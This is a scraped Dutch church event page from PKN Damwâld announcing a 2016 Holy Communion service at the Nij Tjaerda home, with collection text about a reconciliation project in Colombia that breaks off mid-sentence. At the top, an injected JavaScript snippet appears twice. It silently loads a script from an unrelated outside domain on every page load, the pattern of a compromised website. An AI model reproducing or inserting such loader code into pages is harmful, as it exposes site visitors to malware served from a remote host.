;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Viering Heilig Avondmaal Nij Tjaerda - PKN Damwâld
zondag 6 november 2016
16:00 uur

Viering Heilig Avondmaal Nij Tjaerda

Thema: Viering Heilig Avondmaal

Speciaal voor de bewoners van Nij Tjaerda in Damwâld wordt er een korte viering van het Heilig Avondmaal gehouden.Een ieder die deze viering mee wil vieren is van harte welkom.

vg_-01

Informatie

Voorganger:Ds. G. Timmer
Thema:Viering Heilig Avondmaal
Locatie: Nij Tjaerda Damwald, Badhuisweg, Damwâld
Collecte informatie
Eerste collecte: Najaarszendingsweek

Werken aan vrede en verzoening in het door geweld verscheurde Colombia
De bevolking in Colombia snakt naar vrede en rust. Al zestig jaar zitten mensen klem tussen de
strijdende partijen: guerrillalegers, de overheid, paramilitairen en de drugsmaffia. De Mennonieten-kerk in Colombia (genaamd IMCOL) heeft het project ‘Geloven in verzoening’ opgezet. Inge Landman werkt hier als uitgezonden medewerker namens Kerk in Actie aan mee. Samen met medewerkers van IMCOL bezoekt Inge groepen mensen die dagelijks te maken hebben met angst en onrecht. Hoe denken zij over vrede en verzoening? Samen bestuderen ze Bijbelteksten rond thema’s als gerechtigheid, waarheid en vergeving. Aan de hand van de methode ‘Bijbellezen met andere ogen’ bespreken ze wat deze teksten te betekenen hebben in het dagelijks leven. Op die manier komen er verhalen naar boven: over wat mensen meemaken, over relaties en over de maatschappij, waarin onderdrukking en geweld zo’n grote rol spelen. Door hierover te praten, kunnen mensen een duidelijk standpunt bepalen. Veel maatschappelijke organisaties in Colombia pleiten bijvoorbeeld voor het bestraffen van misdaden. Maar in een van de groepen van het IMCOL-project vinden de mensen straf niet het belangrijkst. Zij willen dat de daders hun fouten erkennen, en dat ze eindelijk de eigendoms-rechten van hun land

Tweede collecte: Zending